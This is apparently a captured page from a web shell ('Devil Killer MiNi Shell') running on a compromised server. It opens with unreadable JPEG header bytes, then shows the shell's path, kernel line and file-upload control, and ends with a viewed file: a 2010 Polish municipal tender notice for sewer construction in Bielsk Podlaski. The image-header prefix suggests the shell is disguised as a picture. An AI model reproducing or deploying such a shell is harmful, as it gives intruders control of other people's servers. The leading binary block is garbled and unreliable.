JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/24044-N-2010.html

<p class="kh_header"><b>Bielsk Podlaski: ROZBUDOWA INFRASTRUKTURY OCHRONY ŚRODOWISKA W ULICACH W BIELSKU PODLASKIM realizowana w dwóch zadaniach

ZADANIE I: Budowa kanalizacji sanitarnej i deszczowej wraz z odtworzeniem nawierzchni w  ul. Mickiewicza - Zaułek, 11 Listopada, Wysockiego, Słowackiego, Orzeszkowej, Myśliwskiej i Sadowej
ZADANIE II: Opracowanie dokumentacji projektowej i budowa kanalizacji sanitarnej i deszczowej  wraz z odtworzeniem nawierzchni w ulicy Rejtana, Żeromskiego, 3-go Maja, Kościuszki i Szkolnej .</b><br>
<b>Numer ogłoszenia: 24044 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Bielsk Podlaski , ul. Kopernika 1, 17-100 Bielsk Podlaski, woj. podlaskie, tel. 0-85 73 18 100, faks 0-85 73 18 150.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bielsk-podlaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROZBUDOWA INFRASTRUKTURY OCHRONY ŚRODOWISKA W ULICACH W BIELSKU PODLASKIM realizowana w dwóch zadaniach

ZADANIE I: Budowa kanalizacji sanitarnej i deszczowej wraz z odtworzeniem nawierzchni w  ul. Mickiewicza - Zaułek, 11 Listopada, Wysockiego, Słowackiego, Orzeszkowej, Myśliwskiej i Sadowej
ZADANIE II: Opracowanie dokumentacji projektowej i budowa kanalizacji sanitarnej i deszczowej  wraz z odtworzeniem nawierzchni w ulicy Rejtana, Żeromskiego, 3-go Maja, Kościuszki i Szkolnej ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest wykonanie robót budowlanych związanych z budową kanalizacji sanitarnej i deszczowej  w ramach Projektu pn.  Rozbudowa infrastruktury ochrony środowiska w ulicach w Bielsku Podlaskim .
Zadanie I - Budowa kanalizacji sanitarnej i deszczowej wraz z odtworzeniem nawierzchni w ul. Mickiewicza - Zaułek, 11 Listopada, Wysockiego, Słowackiego, Orzeszkowa, Myśliwska i Sadowa . 
Zakres robót obejmuje wykonanie kanalizacji sanitarnej i deszczowej wraz z odtworzeniem nawierzchni po kanałach na całej szerokości jezdni zgodnie z dokumentacją projektową oraz specyfikacją techniczną wykonania i odbioru robot ;
a)	ul. Mickiewicza - zaułek
- budowa kanalizacji sanitarnej grawitacyjnej długości 93,00 m, 
- budowa kanalizacji sanitarnej tłocznej długości 106,00 m
-  budowa przepompowni ścieków - 1 szt. 
- odtworzenie nawierzchni po trasie kanałów
b)	ul. 11 Listopada
- budowa kanalizacji sanitarnej grawitacyjnej długości 2170,00 m,
- budowa kanalizacji sanitarnej tłocznej długości 310,00 m,
-  budowa przepompowni ścieków - 1 szt. 
- odtworzenie nawierzchni po trasie kanałów
c)	ul. Wysockiego
- budowa kanalizacji sanitarnej grawitacyjnej długości 539,00 m, 
- budowa kanalizacji deszczowej długości 487,00 m, 
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
d)	ul. Słowackiego
- budowa kanalizacji sanitarnej grawitacyjnej długości 234,00 m,
- budowa kanalizacji deszczowej długości 362,00 m,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
e)	ul. E. Orzeszkowej
- budowa kanalizacji sanitarnej grawitacyjnej długości 510,00 m,
- budowa kanalizacji deszczowej długości 562,00 m,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
f)	ul. Myśliwska
- budowa kanalizacji sanitarnej grawitacyjnej długości 294,00 m,
- budowa kanalizacji deszczowej długości 300,00 m,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
g)	ul. Sadowa
- budowa kanalizacji sanitarnej grawitacyjnej długości 113,00 m,
- budowa kanalizacji deszczowej długości 244,00 m,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
Szczegółowy opis przedmiotu zamówienia został przedstawiony w dokumentacji projektowej - projektach wykonawczych, szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz przedmiarach robót, stanowiących  załączniki do niniejszej  siwz.
Roboty będące przedmiotem niniejszej umowy (kontraktu) będą wykonane zgodnie z  WARUNKAMI KONTRAKTOWYMI DLA BUDOWY dla robót inżynieryjno - budowlanych projektowanych przez Zamawiającego ( Czerwony FIDIC ) .
 Wspólny Słownik Zamówień (CPV) : 45 23 24 40 - 8, 45 23 21 30 - 2,4523 32 52-0

Zadanie II - Opracowanie dokumentacji projektowej i budowa kanalizacji sanitarnej i deszczowej wraz z odtworzeniem nawierzchni w ulicy Rejtana, Żeromskiego, 3-go Maja, Kościuszki i Szkolnej  . 
Zakres robót obejmuje zaprojektowanie i wykonanie kanalizacji sanitarnej i deszczowej wraz z odtworzeniem nawierzchni po kanałach na całej szerokości jezdni zgodnie z dokumentacją projektową oraz specyfikacją techniczną wykonania i odbioru robot ;
Wykonawca uzyska wszelkie wymagane, zgodnie z polskim prawem, uzgodnienia, opinie i decyzje administracyjne niezbędne do opracowania dokumentacji projektowej, a w szczególności :
a. przygotuje materiały niezbędne do uzyskania decyzji o środowiskowych           uwarunkowaniach  zgody  na  realizację  przedsięwzięcia i uzyska ją, 
b. opracuje raport  o  oddziaływaniu  na  środowisko, o  ile  takowy  będzie konieczny
c. przygotuje materiały niezbędne do uzyskania decyzji o ustaleniu lokalizacji inwestycji celu publicznego oraz ją uzyska,
d. opracuje operat wodnoprawny oraz uzyska pozwolenie  wodnoprawne  wraz z wykonaniem  wszelkich  niezbędnych  do  tego  celu  badań, opracowań  i analiz ( o ile będzie  konieczne), 
e. wykona  pomiary  geodezyjne  i  inwentaryzacyjne, o  ile  takowe  będą konieczne, 
f. wykona  badania   geotechniczne  gruntu,
g. opracuje  inne, uznane  za  konieczne  przez  Wykonawcę  bądź  stosowne instytucje  i urzędy, opracowania  i  badania, 
h. opracuje kompletną dokumentację projektowo - kosztorysową wraz z projektami branżowymi w zakresie określonym w projekcie umowy    
i. uzyska wszelkie uzgodnienia , opinie i materiały niezbędne do uzyskania pozwolenia na budowę, 
1) Przed przystąpieniem do projektowania, Wykonawca opracuje koncepcję proponowanych rozwiązań i przedłoży ją do akceptacji Zamawiającego, jak również uzyska akceptację jednostek opiniujących.
2) Opracowana dokumentacja musi spełniać wymagania określone aktualnymi przepisami prawa, m.in.:
-Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003 r., Nr 120, poz. 1133 z póź. zm.), 
-Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych  wykonania i odbioru  robót  budowlanych  oraz  programu funkcjonalno - użytkowego  (Dz. U. Nr. 202, poz. 2072  z póź. zm.),
-Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 roku  w  sprawie określenia  metod  i  podstaw  sporządzania  kosztorysu  inwestorskiego, obliczania planowanych  kosztów  prac  projektowych  oraz  planowanych  kosztów  robót budowlanych  określonych  w  programie  funkcjonalno - użytkowym  (Dz. U. Nr 130, poz. 1389),
                 
a)	ul. Rejtana
- budowa kanalizacji sanitarnej długości ok. 0,8 km 
- odtworzenie nawierzchni po trasie kanału
b)	ul. Żeromskiego
- budowa kanalizacji sanitarnej długości ok. 0,5km,
- budowa kanalizacji deszczowej długości  ok. 0,6 km,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
c)	ul. 3-go Maja
- budowa kanalizacji sanitarnej długości ok. 0,5 km, 
- budowa kanalizacji deszczowej długości ok. 0,5 km, 
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
d)	ul. Kościuszki
- budowa kanalizacji sanitarnej długości ok. 0,4 km,
- budowa kanalizacji deszczowej długości ok. 0,3 km,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
e)	ul. Szkolna
- budowa kanalizacji sanitarnej długości  ok. 0,24 km,
- budowa kanalizacji deszczowej długości  ok. 0,24 km,
- odtworzenie nawierzchni po kanałach na całej szerokości jezdni
Wspólny Słownik Zamówień ( CPV) -71320000-7, 45232440-8, 45232130 - 2, 45233252 - 0
Szczegółowy opis przedmiotu zamówienia został przedstawiony w programie funkcjonalno - użytkowym.
Roboty będące przedmiotem niniejszej umowy (kontraktu) będą wykonane zgodnie z  WARUNKAMI KONTRAKTOWYMI DLA URZĄDZEŃ ORAZ PROJEKTOWANIA I BUDOWY dla urządzeń elektrycznych i mechanicznych oraz robot inżynieryjnych i budowlanych projektowanych przez Wykonawcę ( Żółty FIDIC).
2. Podane w dokumentacji projektowej ( dotyczy zadania I)  nazwy lub typy materiałów  i produktów mają na celu wskazanie parametrów jakościowych. W przypadku materiałów i produktów określonych w dokumentacji projektowej nazwą producenta , Zamawiający  dopuszcza zastosowanie materiałów  równoważnych zgodnie z art. 29 ust. 3 ustawy p.z.p. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego zobowiązany jest do wypełnienia wymogu wynikającego z art. 30 ust. 5 ustawy p.z.p..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.40-8, 45.23.21.30-2, 71.32.00.00-7, 45.23.32.52-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 99000zł dla zadania I
78000 zł dla zadania II<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia  na podstawie art.24 ust.1 i 2 ustawy i spełniają warunki dotyczące   :

1. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2. posiadania wiedzy i doświadczenia ,
3. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
4. sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
Warunki dodatkowe wymagane od Wykonawców:
1. Dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia :
Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli wykaże co najmniej 1 osobę:
 - posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności sanitarnej i drogowej bez ograniczeń wymagane przepisami ustawy z dnia 07 lipca 1994r. Prawo budowlane ( dla zadania I i zadania II),
-  posiadającą uprawnienia budowlane do projektowania w zakresie sieci sanitarnej i drogowej wymagane przepisami ustawy z dnia 07 lipca 1994r. Prawo budowlane  ( dla zadania II).
2.Wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 1 inwestycję obejmującą wykonanie robót budowlanych , którego przedmiotem była  budowa kanalizacji sanitarnej lub kanalizacji deszczowej o wartości co najmniej 1 000 000 zł brutto ( dla zadania I) i 800 000 zł brutto ( dla zadania II) ,
3. Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę projektową dot. robót sanitarnych i drogowych o wartości brutto 150 000 zł
4.Posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 
1 000 000 PLN  (dla zadania I i zadania II), 

5. Wykonają roboty zgodnie z harmonogramem realizacji zamówienia stanowiącym załącznik Nr 8 do siwz ( dla zadania I) i Nr 8A ( dla zadania II)

6.Wyrażą zgodę na zapłatę faktur w ciągu 30 dni od daty ich wpływu do Zamawiającego.

7.Udzielą rękojmi na okres 24 miesięcy od daty wystawienia Świadectwa Przejęcia dla całości robót .

Ocena spełniania w.w warunków dokonana zostanie zgodnie z formułą -spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w.w warunki wykonawca spełnił.

Zamawiający informuje , że zgodnie z przepisami ustawy Prawo zamówień publicznych, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego  łączących go z nimi stosunków . Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów  na okres  korzystania z nich przy wykonywaniu zamówienia.
Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów  dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego , może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia spełnienia warunków stawianych Wykonawcom przez Zamawiającego oraz dla uznania formalnej poprawności, oferta musi zawierać następujące oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1. Wypełniony formularz ofertowy (wg załącznika Nr 1 do SIWZ).

2. Oświadczenie o braku podstaw do wykluczenia oraz o spełnianiu warunków udziału w postępowaniu - wg załącznika Nr 2 do SIWZ (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, Oświadczenie o spełnianiu warunków udziału w postępowaniu może być złożone wspólnie, przy czym winno być podpisane przez każdego z tych Wykonawców lub przez Pełnomocnika upoważnionego do reprezentowania ich w postępowaniu).

3. Aktualny odpis z właściwego rejestru, jeżeli  odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1  pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert , a w stosunku do osób fizycznych oświadczenie w zakresie art.24 ust.1 pkt.2 ustawy - wg załącznika Nr 2 do SIWZ (W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich. 
4. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich.) 
5. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ( w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich.)
 6. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacją na temat  ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - co najmniej 1 osoba do kierowania robotami w specjalności drogowej i sanitarnej bez ograniczeń ( dla zadania  I i zadania II) oraz co najmniej 1 osoba posiadająca uprawnienia budowlane do projektowania w zakresie sieci drogowej i sanitarnej ( dla zadania II)  - wg  załącznika Nr 3 do SIWZ  (Wykonawcy składający ofertę wspólną winni złożyć jeden wspólny wykaz).
Wykonawca zobowiązany jest złożyć oświadczenie, że osoby , które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia.

7. Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 inwestycja obejmująca wykonanie robót sanitarnych (kanalizacji sanitarnej lub kanalizacji deszczowej ) o wartości co najmniej 1 000 000 zł brutto ( dla zadania I) i 800 000 zł brutto ( dla zadania II) z podaniem rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że robota ta została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona ( np. referencje, protokoły odbioru)- wg załącznika Nr 4 do SIWZ (Wykonawcy składający ofertę wspólną winni złożyć jeden wspólny wykaz).

8. Wykaz wykonanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługa projektowa dot. robót sanitarnych i drogowych o wartości co najmniej 150 000 zł brutto, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumentami potwierdzającymi, że usługa została wykonana lub jest wykonywana należycie( np. referencje, protokoły odbioru )- wg załącznika Nr 5 - dla zadania II ( Wykonawcy składający ofertę wspólną składają jeden wspólny wykaz) 

9. Kosztorys ofertowy z cenami jednostkowymi ryczałtowymi oraz wartością zamówienia /netto + podatek VAT/wg załącznika Nr 7 do SIWZ - dla zadania I (Wykonawcy składający ofertę wspólną winni złożyć jeden wspólny kosztorys).

10. Wskaźniki cenotwórcze /R, Ko, Kz, Z/ użyte do wyliczenia wartości ofertowej, do rozliczenia robót, których Zamawiający nie mógł przewidzieć w chwili zawarcia umowy - dla zadania I (Wykonawcy składający ofertę wspólną winni złożyć jeden wspólny wykaz),
11. Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość  posiadanych środków finansowych  lub zdolność kredytową Wykonawcy na kwotę co najmniej 1 000 000 zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - dla zadania I i zadania II (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa ),
Jeżeli Wykonawca ,wykazując spełnianie warunku, dot. potencjału finansowo - ekonomicznego polega na  zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy p.z.p., wymaga się przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej określonej w pkt. 9.11. dotyczącej tych podmiotów.

12.  Dowód wniesienia wadium
13.  Pełnomocnictwo - w przypadku, gdy oferta została podpisana przez pełnomocnika, lub gdy oferta została złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy pzp. ,
14. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, sklada dokumenty zgodnie z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane ( Dz. U. Nr 226 poz. 1817). Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa  w:
1) pkt.9.3., 9.4., 9.5., składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
2) Dokument, o którym mowa w pkt.9.3. powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, natomiast dokumenty, o których mowa w pkt. 9.4. i 9.5. powinne być wystawione nie wcześniej niż 3 miesiące przed upływem składania ofert.
 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.9.14. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
  
Brak jakiegokolwiek z dokumentów wymienionych w SIWZ  spowoduje wykluczenie Wykonawcy z udziału w postępowaniu i odrzucenie oferty z zastrzeżeniem art.26 ust. 3 ustawy Prawo zamówień publicznych.
Dane ekonomiczne i finansowe przedstawione przez Wykonawcę, które mają potwierdzić spełnienie przez Wykonawców warunków określonych w pkt. 9. podane przez Wykonawcę spoza terytorium RP, w walucie innej niż PLN zostaną przez Zamawiającego przeliczone na PLN według średniego kursu Narodowego Banku Polskiego obowiązującego w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bielsk-podlaski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Bielsk Podlaski ul. Kopernika 1, 17-100 Bielsk Podlaski, pokój Nr 27.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2010 godzina 10:00, miejsce: Urząd Miasta Bielsk Podlaski ul.Kopernika 1, 17-100 Bielsk Podlaski, biuro podawcze.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
